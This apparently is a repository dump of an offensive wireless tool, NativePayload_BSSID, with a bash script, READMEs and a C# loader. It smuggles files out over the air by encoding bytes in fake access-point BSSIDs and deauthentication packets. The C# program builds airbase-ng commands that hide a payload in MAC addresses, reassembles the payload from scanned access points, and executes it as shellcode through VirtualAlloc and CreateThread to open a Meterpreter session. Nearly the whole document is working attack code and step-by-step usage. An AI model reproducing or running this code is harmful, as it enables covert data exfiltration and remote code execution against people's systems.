[ $1 == "-deauthdumps" ] 666 | then 667 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel 668 | ExfilDeauthDumps_CmdBased "$2" "$3" "$4" "$5" 669 | fi 670 | 671 | if [ $1 == "help" ] 672 | then 673 | tput setaf 2; 674 | echo "$(tput setaf 10)--------------------------------------------------------" 675 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v1 $(tput setaf 2)Syntax: " 676 | echo 677 | echo "$(tput setaf 3)Step1 (Client Side):" 678 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)[text-file] $(tput setaf 6)[Fake-AP-Name] $(tput setaf 11)[MonitorMode-Interface]" 679 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -f $(tput setaf 14)mytext.txt $(tput setaf 6)myfakeAP $(tput setaf 11)Wlan3mon" 680 | echo 681 | echo "$(tput setaf 3)Step2 (Server Side):" 682 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)[Wifi-Interface] $(tput setaf 6)[Exfil-Dump-file]" 683 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -s $(tput setaf 14)wlan0 $(tput setaf 6)ExfilDumped.txt" 684 | echo 685 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)" 686 | echo "Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : $(tput setaf 10)airmon-ng start wlan3 " 687 | echo "$(tput setaf 10)--------------------------------------------------------" 688 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax I: " 689 | echo 690 | echo "$(tput setaf 3)Step1 (Server Side):" 691 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)[FakeAP-ESSID] $(tput setaf 6)[MonitorMode-Interface]$(tput setaf 11) [Wifi-Channel] $(tput setaf 3)[FakeAP-BSSID]" 692 | echo "$(tput setaf 2)Example [System B]:$(tput setaf 10)./NativePayload_BSSID.sh -deauthdumps $(tput setaf 14)MyFakeAP $(tput setaf 6)wlan1mon$(tput setaf 11) 7 $(tput setaf 3)00:12:32:44:64:19" 693 | echo 694 | echo "$(tput setaf 3)Step2 (Client Side):" 695 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)[text-file] $(tput setaf 6)[Target-FakeAP-BSSID] $(tput setaf 11)[Wifi-Interface] $(tput setaf 3)[Wifi-Channel] $(tput setaf 4)[dbg]/[fast]/[faster]" 696 | echo "$(tput setaf 2)Example [System A]:$(tput setaf 10)./NativePayload_BSSID.sh -exfildeauth $(tput setaf 14)mypayload.txt $(tput setaf 6)00:12:32:44:64:19 $(tput setaf 11)wlan2 $(tput setaf 3)7 $(tput setaf 4)faster" 697 | echo 698 | echo "$(tput setaf 3)Description:$(tput setaf 2) with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump tool in this step in server side , Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : $(tput setaf 10)airmon-ng start wlanX " 699 | echo "$(tput setaf 2)with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly..." 700 | echo "Note: $(tput setaf 10)via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets." 701 | echo "$(tput setaf 10)--------------------------------------------------------" 702 | echo "$(tput setaf 2)NativePayload_BSSID.sh$(tput setaf 11) v2 $(tput setaf 2)Syntax II: " 703 | echo "$(tput setaf 3)(Server/Client Side):" 704 | echo "$(tput setaf 2)Syntax :$(tput setaf 10)./NativePayload_BSSID.sh -exfilserver" 705 | echo "$(tput setaf 3)Description:$(tput setaf 2) for more information please read PDF/Article on Github..." 706 | echo "$(tput setaf 10)--------------------------------------------------------" 707 | 708 | fi 709 | 710 | # myrecords="" 711 | # ChatInputArray=() 712 | # base64isonoff="false" 713 | # isb64="false" 714 | # iscmdshellonoff="off" 715 | isdebug="off" 716 | ExfilMode="bssid" 717 | server_client_Mode="server" 718 | 719 | if [ $1 == "-exfilserver" ]; 720 | then 721 | 722 | while [ "$input" != "exit" ] 723 | do 724 | while true ; 725 | do 726 | 727 | if [ $ExfilMode == "bssid" ] ; 728 | then 729 | 730 | if [ "$server_client_Mode" == "client" ] 731 | then 732 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 733 | else 734 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)BSSID$(tput setaf 2)]#$(tput setaf 11) " input 735 | fi 736 | else 737 | 738 | if [ "$server_client_Mode" == "client" ] 739 | then 740 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Client$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 741 | else 742 | read -p "$(tput setaf 2)[>]:WIFI::Chat:input:[$(tput setaf 3)Server$(tput setaf 2)][$(tput setaf 3)DeAuth$(tput setaf 2)]#$(tput setaf 11) " input 743 | fi 744 | fi 745 | tput setaf 2 746 | if [[ $input == "@exit" ]] 747 | then 748 | exit ; 749 | elif [[ "$input" == "@clear" ]] ; 750 | then 751 | clear ; 752 | elif [[ "$input" == "@help" ]] ; 753 | then 754 | _help "$server_client_Mode" ; 755 | elif [[ "$input" == "@clientmode" || "$input" == "@cli" ]] ; 756 | then 757 | tput setaf 10 758 | echo "[@]:ChatMode::Client.Mode:On" 759 | tput setaf 2 760 | server_client_Mode="client" 761 | elif [[ "$input" == "@servermode" || "$input" == "@serv" ]] ; 762 | then 763 | tput setaf 10 764 | echo "[@]:ChatMode::Server.Mode:On" 765 | nohup killall airbase-ng > "killairbase.txt" 2>&1 & 766 | tput setaf 2 767 | server_client_Mode="server" 768 | elif [[ "$input" == "@run" ]] ; 769 | then 770 | if [ "$server_client_Mode" == "server" ] 771 | then 772 | tput setaf 10 773 | if [ "$ExfilMode" == "bssid" ] 774 | then 775 | echo "[@]:ChatMode::ServerSide.[Bssid].Scanning.AccessPoints:Started" 776 | break; 777 | else 778 | echo "[@]:ChatMode::ServerSide.[DeAuth].Scanning.Mode:Started" 779 | break; 780 | fi 781 | else 782 | tput setaf 10 783 | echo "[@]:this command supported in [ServerSide] only" 784 | fi 785 | tput setaf 2 786 | elif [[ "$input" == "@dbgon" ]] ; 787 | then 788 | tput setaf 10 789 | echo "[@]:ChatMode::Debug.ShowDetails:On" 790 | tput setaf 2 791 | isdebug="on" 792 | elif [[ "$input" == "@dbgoff" ]] ; 793 | then 794 | tput setaf 10 795 | echo "[@]:ChatMode::Debug.ShowDetails:Off" 796 | tput setaf 2 797 | isdebug="off" 798 | elif [[ "$input" == "@bssid" || "$input" == "bssid" ]] ; 799 | then 800 | tput setaf 10 801 | ExfilMode="bssid" 802 | echo "[@]:ChatMode::SendbyBSSID:On" 803 | tput setaf 2 804 | elif [[ "$input" == "@deauth" ]] ; 805 | then 806 | tput setaf 10 807 | ExfilMode="deauth" 808 | echo "[@]:ChatMode::SendbyDeAuth:On" 809 | tput setaf 2 810 | elif [[ $input != '' && $input != "@"* && "$server_client_Mode" == "client" ]] ; 811 | then 812 | break; 813 | elif [[ $input != '' && $input == "@run" && "$server_client_Mode" == "server" ]] ; 814 | then 815 | break; 816 | else 817 | Again="Again;)" 818 | fi 819 | done 820 | 821 | if [ "$ExfilMode" == "bssid" ] 822 | then 823 | if [ "$server_client_Mode" == "client" ] 824 | then 825 | if [ "$isdebug" == "off" ] 826 | then 827 | 828 | nohup killall airbase-ng > "kill.txt" 2>&1 & 829 | while true ; 830 | do 831 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 832 | if [ "$input2" != '' ] 833 | then 834 | break 835 | fi 836 | done 837 | sendBssids "$input" "fake" "$input2" "false" 838 | else 839 | nohup killall airbase-ng > "kill.txt" 2>&1 & 840 | while true ; 841 | do 842 | read -p "$(tput setaf 2)[>]:WIFI::Monitor.Mode.[Interface]:input:[$(tput setaf 3)wlan0mon$(tput setaf 2)]#$(tput setaf 11) " input2 843 | if [ "$input2" != '' ] 844 | then 845 | break 846 | fi 847 | done 848 | sendBssids "$input" "fake" "$input2" "true" 849 | fi 850 | else 851 | if [ "$isdebug" == "off" ] 852 | then 853 | while true ; 854 | do 855 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 856 | if [ "$input2" != '' ] 857 | then 858 | break 859 | fi 860 | done 861 | receiveBssids "$input2" "myExfildump.txt" "false" 862 | else 863 | while true ; 864 | do 865 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " input2 866 | if [ "$input2" != '' ] 867 | then 868 | break 869 | fi 870 | done 871 | receiveBssids "$input2" "myExfildump.txt" "true" 872 | fi 873 | 874 | fi 875 | 876 | fi 877 | if [ "$ExfilMode" == "deauth" ] 878 | then 879 | if [ "$server_client_Mode" == "client" ] 880 | then 881 | if [ "$isdebug" == "off" ] 882 | then 883 | while true ; 884 | do 885 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 886 | if [ "$wlan_input2" != '' ] 887 | then 888 | break 889 | fi 890 | done 891 | while true ; 892 | do 893 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 894 | if [ "$channel_input3" != '' ] 895 | then 896 | break 897 | fi 898 | done 899 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "false" 900 | else 901 | while true ; 902 | do 903 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Interface]:input:[$(tput setaf 3)wlan0$(tput setaf 2)]#$(tput setaf 11) " wlan_input2 904 | if [ "$wlan_input2" != '' ] 905 | then 906 | break 907 | fi 908 | done 909 | while true ; 910 | do 911 | read -p "$(tput setaf 2)[>]:WIFI::Wlan.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channel_input3 912 | if [ "$channel_input3" != '' ] 913 | then 914 | break 915 | fi 916 | done 917 | ExfilDeauth "$input" "00:11:22:33:44:55" "$wlan_input2" "$channel_input3" "true" 918 | fi 919 | else 920 | if [ "$isdebug" == "off" ] 921 | then 922 | while true ; 923 | do 924 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 925 | if [ "$wlanmon_input2" != '' ] 926 | then 927 | break 928 | fi 929 | done 930 | while true ; 931 | do 932 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 933 | if [ "$channelmon_input3" != '' ] 934 | then 935 | break 936 | fi 937 | done 938 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "false" 939 | else 940 | while true ; 941 | do 942 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Interface]:input:[$(tput setaf 3)wlan1mon$(tput setaf 2)]#$(tput setaf 11) " wlanmon_input2 943 | if [ "$wlanmon_input2" != '' ] 944 | then 945 | break 946 | fi 947 | done 948 | while true ; 949 | do 950 | read -p "$(tput setaf 2)[>]:WIFI::WlanMon.[Channel]:input:[$(tput setaf 3)1$(tput setaf 2)]#$(tput setaf 11) " channelmon_input3 951 | if [ "$channelmon_input3" != '' ] 952 | then 953 | break 954 | fi 955 | done 956 | ExfilDeauthDumps "" "$wlanmon_input2" "$channelmon_input3" "true" 957 | fi 958 | 959 | fi 960 | fi 961 | 962 | done 963 | fi 964 | ################################################## version 2 ################################################## 965 | -------------------------------------------------------------------------------- /NativePayload_BSSID v2/README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_BSSID.sh v2 2 | 3 | Exfiltration via Wireless DeAuthentication Packets from Client to Server on AIR (without user-pass or Wifi Connection & very fast) 4 | 5 | Note: this code tested in kali linux systems (only). 6 | 7 | Article/Pdf and New video will Publish here soon... 8 | 9 | Video[1] , NativePayload_BSSID.sh v2 (step by step) : https://www.youtube.com/watch?v=rg-O4RKt9OA 10 | 11 | as you can see in this "Picture 1", with this switch "help" you can see Help information : ./NativePayload_BSSID.sh help 12 | 13 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20help.png) 14 | Picture 1: 15 | 16 | # NativePayload_BSSID.sh (help): 17 | 18 | NativePayload_BSSID.sh v1 Syntax: 19 | 20 | Step1 (Client Side): 21 | Syntax :./NativePayload_BSSID.sh -f [text-file] [Fake-AP-Name] [MonitorMode-Interface] 22 | Example [System A]:./NativePayload_BSSID.sh -f mytext.txt myfakeAP Wlan3mon 23 | 24 | Step2 (Server Side): 25 | Syntax :./NativePayload_BSSID.sh -s [Wifi-Interface] [Exfil-Dump-file] 26 | Example [System B]:./NativePayload_BSSID.sh -s wlan0 ExfilDumped.txt 27 | 28 | Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , 29 | with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool) 30 | Note : before step1 you should make Monitor-Mode Interface (WlanXmon) by this command for example : airmon-ng start wlan3 31 | -------------------------------------------------------- 32 | NativePayload_BSSID.sh v2 Syntax I: 33 | 34 | Step1 (Server Side): 35 | Syntax :./NativePayload_BSSID.sh -deauthdumps [FakeAP-ESSID] [MonitorMode-Interface] [Wifi-Channel] [FakeAP-BSSID] 36 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 37 | 38 | Step2 (Client Side): 39 | Syntax :./NativePayload_BSSID.sh -exfildeauth [text-file] [Target-FakeAP-BSSID] [Wifi-Interface] [Wifi-Channel] [dbg]/[fast]/[faster] 40 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 41 | 42 | Description: with Step1 (system B) you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 43 | tool in this step in server side , 44 | Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : airmon-ng start wlanX 45 | with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly... 46 | note: via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets. 47 | -------------------------------------------------------- 48 | NativePayload_BSSID.sh v2 Syntax II: 49 | 50 | (Server/Client Side): 51 | Syntax :./NativePayload_BSSID.sh -exfilserver 52 | Description: for more information please read PDF/Article on Github... (soon) 53 | -------------------------------------------------------- 54 | 55 | -------------------------------------------------------------------------------------- 56 | 57 | # NativePayload_BSSID.sh v2 58 | # and DeAuth Method (step by step): 59 | 60 | Step 1 : 61 | with switch "-deauthdumps" you will have Fake AP via wlanXmon interface also DeAuth Packets will Dump via Tcpdump 62 | tool in this step in server side. 63 | 64 | Note: before step1 you should make WlanXmon Monitor-Mode Interface by this command : airmon-ng start wlanX 65 | 66 | Step1 (Server Side): 67 | Example [System B]:./NativePayload_BSSID.sh -deauthdumps MyFakeAP wlan1mon 7 00:12:32:44:64:19 68 | 69 | 70 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step1.png) 71 | Picture 2: 72 | 73 | Step 2 : 74 | with Step2 your Client (system A) will send that text file to (Target/system B) via DeAuth Packets On AIR Directly... 75 | note: via Step2 your Payload Injected to Client.BSSIDs in DeAuth Packets. 76 | 77 | Step2 (Client Side): 78 | Example [System A]:./NativePayload_BSSID.sh -exfildeauth mypayload.txt 00:12:32:44:64:19 wlan2 7 faster 79 | 80 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step2.png) 81 | Picture 3: 82 | 83 | as you can see in "Picture 4" after 5 seconds that text file "3.txt" Exfiltrated from client to server on AIR ,(very simple). 84 | 85 | ![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSIDv2/NativePayload_BSSID%20Step4.png) 86 | Picture 4: 87 | 88 | Article and Pdf File will Publish here soon... 89 | 90 | Video STEP BY STEP : https://www.youtube.com/watch?v=rg-O4RKt9OA 91 | 92 | -------------------------------------------------------------------------------- /NativePayload_BSSID.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using NativeWifi; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace NativePayload_BSSID 9 | { 10 | class Program 11 | { 12 | 13 | static string GetStringForSSID(Wlan.Dot11Ssid ssid) 14 | { 15 | return Encoding.ASCII.GetString(ssid.SSID, 0, (int)ssid.SSIDLength); 16 | } 17 | 18 | static string Temp_BSSID = ""; 19 | static int counter = 0; 20 | static WlanClient client = new WlanClient(); 21 | static bool init = false; 22 | static bool onetime = false; 23 | 24 | static string __show_BSSID(string filter_bssid) 25 | { 26 | try 27 | { 28 | 29 | foreach (WlanClient.WlanInterface wlanIface in client.Interfaces) 30 | { 31 | try 32 | { 33 | 34 | System.Threading.Thread.Sleep(1000); 35 | Wlan.WlanBssEntry[] BSSLIST = wlanIface.GetNetworkBssList(); 36 | 37 | try 38 | { 39 | wlanIface.Scan(); 40 | } 41 | catch (Exception x1) 42 | { 43 | 44 | Console.WriteLine("x1: " + x1.Message); 45 | 46 | } 47 | Temp_BSSID = ""; 48 | foreach (Wlan.WlanBssEntry item in BSSLIST) 49 | { 50 | string temp_filter = GetStringForSSID(item.dot11Ssid); 51 | if (temp_filter == filter_bssid) 52 | { 53 | 54 | Console.ForegroundColor = ConsoleColor.DarkCyan; 55 | Console.Write("Detecting BSSID :"); 56 | Console.ForegroundColor = ConsoleColor.Cyan; 57 | foreach (var item2 in item.dot11Bssid) 58 | { 59 | Console.Write(" {0}", item2.ToString("x2")); 60 | Temp_BSSID += item2.ToString("x2"); 61 | } 62 | Console.ForegroundColor = ConsoleColor.DarkCyan; 63 | Console.Write(" ESSID :"); 64 | Console.Write(" " + GetStringForSSID(item.dot11Ssid)); 65 | 66 | } 67 | 68 | 69 | } 70 | if (Temp_BSSID.Length > 2) 71 | { 72 | // remove 00 from first section , getting payload only since fake macaddress 73 | Temp_BSSID = Temp_BSSID.Substring(2); 74 | } 75 | 76 | if (Temp_BSSID == "ffffffffff") init = true; 77 | 78 | if (init && MacAddress.Capacity != 0 && Temp_BSSID != MacAddress.AsEnumerable().Last().ToString() && Temp_BSSID!="ff00ff00ff" ) 79 | { 80 | Console.ForegroundColor = ConsoleColor.DarkGreen; 81 | Console.Write(" Dumped "); 82 | if (Temp_BSSID != "") 83 | { 84 | /// something is wrong or error happend 85 | /// sometimes this value is higher than 10 like 20 so we should getting last 10 char for this value always 86 | /// for dumping new and Correct BSSID 87 | if (Temp_BSSID.Length > 10) 88 | { 89 | Temp_BSSID = Temp_BSSID.Substring(Temp_BSSID.Length - 10); 90 | Console.ForegroundColor = ConsoleColor.Red; 91 | Console.Write("[X] {0}", Temp_BSSID); 92 | Console.ForegroundColor = ConsoleColor.DarkYellow; 93 | 94 | } 95 | 96 | counter++; 97 | MacAddress.Add(Temp_BSSID); 98 | } 99 | } 100 | else if (MacAddress.Capacity == 0) 101 | { 102 | Console.ForegroundColor = ConsoleColor.DarkYellow; 103 | Console.Write(" Dumped \n"); 104 | if (Temp_BSSID != "" && Temp_BSSID != "ffffffffff") 105 | { 106 | /// something is wrong or error happend 107 | /// sometimes this value is higher than 10 like 20 so we should getting last 10 char for this value always 108 | /// for dumping new and Correct BSSID 109 | if (Temp_BSSID.Length > 10) 110 | { 111 | Temp_BSSID = Temp_BSSID.Substring(Temp_BSSID.Length - 10); 112 | Console.ForegroundColor = ConsoleColor.Red; 113 | Console.Write("[X] {0}", Temp_BSSID); 114 | Console.ForegroundColor = ConsoleColor.DarkYellow; 115 | } 116 | 117 | counter++; 118 | MacAddress.Add(Temp_BSSID); 119 | } 120 | } 121 | else if (Temp_BSSID == "ff00ff00ff") 122 | { 123 | // time to exit and run payload 124 | Console.ForegroundColor = ConsoleColor.Red; 125 | Console.WriteLine("\n Done. \n"); 126 | Console.WriteLine("Running Payload ..."); 127 | return Temp_BSSID; 128 | } 129 | 130 | if (MacAddress.Capacity != 0) 131 | { 132 | Console.WriteLine(" ==> " + counter + " " + MacAddress.AsEnumerable().Last().ToString()); 133 | 134 | 135 | } 136 | 137 | } 138 | catch (Exception ee) 139 | { 140 | Console.WriteLine("e2: "+ee.Message); 141 | 142 | } 143 | 144 | /// this code was for Connecting by WEP or WPA to AP , 145 | /// but for Dumping Injected Payloads FROM Fake AP you need Scan Method only 146 | /// if ypu want to develop your own code like this for Connecting via Fake Access Point this code is very good ;) 147 | /// something like Evil-Twin .... 148 | /// and maybe you want get mterpreter session by WIFI traffic with Fake AP then you need this code for connecting 149 | /// to Fake AP in C# 150 | /// also you can dump information for this code like KEY , MAC and ProfileName from Fake AP by my technique too 151 | /// note : by Scan Method your attack is very Slowly and Quietly too 152 | 153 | //foreach (Wlan.WlanProfileInfo profileInfo in wlanIface.GetProfiles()) 154 | //{ 155 | // string name = profileInfo.profileName; // this is typically the network's SSID 156 | 157 | // string xml = wlanIface.GetProfileXml(profileInfo.profileName); 158 | //} 159 | 160 | //string profileName = "Cheesecake"; 161 | //string mac = "52544131303235572D454137443638"; 162 | //string key = "hello"; 163 | //string profileXml = string.Format("{0}{1}{0}ESSopenWEPfalsenetworkKeyfalse{2}0", profileName, mac, key); 164 | 165 | //wlanIface.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true); 166 | //wlanIface.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName); 167 | //wlanIface.DeleteProfile(profileName); 168 | } 169 | } 170 | catch (Exception eee) 171 | { 172 | Console.WriteLine("e3: " + eee.Message); 173 | } 174 | return Temp_BSSID; 175 | } 176 | 177 | static List MacAddress = new List(); 178 | public static string payload = ""; 179 | static void Main(string[] args) 180 | { 181 | try 182 | { 183 | 184 | if (args.Length >= 1 && args[0].ToUpper() == "NULL") 185 | { 186 | Console.ForegroundColor = ConsoleColor.Red; 187 | Console.WriteLine(); 188 | Console.WriteLine("Copy these lines to bash script1.sh file ;)"); 189 | Console.WriteLine(); 190 | Console.ForegroundColor = ConsoleColor.Gray; 191 | if (args.Length >= 2 && args[1] != null) { payload = args[1].ToString(); } 192 | int b = 0; 193 | int j = 0; 194 | int LinesCode = 0; 195 | string temp = ""; 196 | /// "00:ff:00:ff:00:ff" flag for Attack start 197 | Console.WriteLine("airbase-ng -a 00:" + "ff:ff:ff:ff:ff" + " --essid \"Fake\" -I 10 -0 wlan0mon ;"); 198 | foreach (char item in payload) 199 | { 200 | temp += item; 201 | 202 | b++; 203 | j++; 204 | if (j == 2) { temp += ":"; j = 0; } 205 | if (b >= 10) 206 | { 207 | /// essid is name for Access point , in this case "Fake" ;) 208 | /// -I 10 , don't change this one , please 209 | Console.Write("airbase-ng -a 00:" + temp.Substring(0, temp.Length - 1) + " --essid \"Fake\" -I 10 -0 wlan0mon ;"); 210 | Console.WriteLine(""); b = 0; 211 | temp = ""; 212 | LinesCode++; 213 | } 214 | 215 | } 216 | /// "00:ff:00:ff:00:ff" flag for Attack Finish 217 | Console.WriteLine("airbase-ng -a 00:" + "ff:00:ff:00:ff" + " --essid \"Fake\" -I 10 -0 wlan0mon ;"); 218 | 219 | Console.WriteLine(""); 220 | Console.WriteLine("(" + LinesCode.ToString() + ") Command Lines for this PAYLOAD : " + payload); 221 | 222 | } 223 | else if (args[0].ToUpper() != "NULL" && args[0].ToUpper() != "HELP") 224 | { 225 | Console.ForegroundColor = ConsoleColor.Gray; 226 | Console.WriteLine(); 227 | Console.WriteLine("NativePayload_BSSID Tool Published by Damon Mohammadbagher"); 228 | Console.WriteLine("Scanning Access Point : " + args[0].ToString()); 229 | Console.WriteLine(); 230 | 231 | 232 | while (true) 233 | { 234 | 235 | /// dont change sleep time ;) 8 ... 10 is good 236 | /// if you want change these times then you need change all sleep value in Script1.sh Sleep(Value_Time) too 237 | System.Threading.Thread.Sleep(8000); 238 | 239 | string _tmp_bssid = __show_BSSID(args[0]); 240 | 241 | /// flag for finish and execute Payload for getting Meterpreter Session 242 | if (_tmp_bssid == "ff00ff00ff") break; 243 | } 244 | 245 | /// time to getting Meterpreter Session ;) 246 | byte[] _X_Bytes = new byte[MacAddress.Capacity * 5]; 247 | int b = 0; 248 | foreach (string X_item in MacAddress) 249 | { 250 | for (int i = 0; i <= 8; ) 251 | { 252 | /// for debug only 253 | /// string MacAddress_Octets = X_item.ToString().Substring(i, 2); 254 | 255 | _X_Bytes[b] = Convert.ToByte("0x" + X_item.ToString().Substring(i, 2), 16); 256 | 257 | b++; 258 | 259 | i++; i++; 260 | } 261 | } 262 | try 263 | { 264 | Console.WriteLine("Dumped Payloads : "); 265 | int k = 0; 266 | foreach (string item in MacAddress) 267 | { 268 | Console.Write(k.ToString() + ": " + item.ToString() + " "); 269 | k++; 270 | } 271 | Console.WriteLine("15 sec Waiting...."); 272 | System.Threading.Thread.Sleep(15000); 273 | Console.ForegroundColor = ConsoleColor.Yellow; 274 | Console.WriteLine("End time : {0}", DateTime.Now.ToString()); 275 | Console.ForegroundColor = ConsoleColor.Gray; 276 | Console.WriteLine("Bingo Meterpreter session by BSSID and WIFI Traffic ;)"); 277 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)_X_Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 278 | Marshal.Copy(_X_Bytes, 0, (IntPtr)(funcAddr), _X_Bytes.Length); 279 | IntPtr hThread = IntPtr.Zero; 280 | UInt32 threadId = 0; 281 | IntPtr pinfo = IntPtr.Zero; 282 | // execute native code 283 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 284 | WaitForSingleObject(hThread, 0xFFFFFFFF); 285 | 286 | } 287 | catch (Exception e6) 288 | { 289 | 290 | Console.ForegroundColor = ConsoleColor.Gray; 291 | Console.WriteLine("Main Error : {0}", e6.Message); 292 | } 293 | } 294 | else if(args[0].ToUpper()=="HELP") 295 | { 296 | Console.ForegroundColor = ConsoleColor.Gray; 297 | Console.WriteLine(); 298 | Console.WriteLine("NativePayload_BSSID Tool Published by Damon Mohammadbagher"); 299 | Console.WriteLine("Transferring Payload on AIR by BSSID and WIFI Traffic \n"); 300 | Console.ForegroundColor = ConsoleColor.Cyan; 301 | Console.WriteLine("syntax 1 : Making Script.sh File for making Fake AP"); 302 | Console.WriteLine("\t and injecting Payloads to AP MAC-Address by airbase-ng \n"); 303 | Console.WriteLine("syntax 1 : NativePaylaod_BSSID.exe null \"payload string\""); 304 | Console.WriteLine("syntax 1 : NativePaylaod_BSSID.exe null \"fce80f109ab0371fbcd1100...\"\n"); 305 | Console.ForegroundColor = ConsoleColor.DarkCyan; 306 | Console.WriteLine("syntax 2 : NativePaylaod_BSSID.exe \"Name for Access point OR essid\""); 307 | Console.WriteLine("syntax 2 : NativePaylaod_BSSID.exe \"fake\""); 308 | Console.ForegroundColor = ConsoleColor.Gray; 309 | } 310 | } 311 | catch (Exception e) 312 | { 313 | 314 | Console.WriteLine(e.Message); 315 | } 316 | 317 | } 318 | private static UInt32 MEM_COMMIT = 0x1000; 319 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 320 | 321 | [DllImport("kernel32")] 322 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 323 | [DllImport("kernel32")] 324 | private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType); 325 | [DllImport("kernel32")] 326 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 327 | [DllImport("kernel32")] 328 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 329 | } 330 | 331 | } 332 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NativePayload_BSSID 2 | Transferring Backdoor Payload by BSSID and Wireless traffic 3 | 4 | Published by Damon Mohammadbagher 5 | 6 | 7 | Syntax : NativePayload_BSSID.exe help 8 | 9 | Syntax : NativePayload_BSSID.exe null "payload string" 10 | 11 | Syntax : NativePayload_BSSID.exe "ESSID" 12 | 13 | 14 | For Step by step you should visit 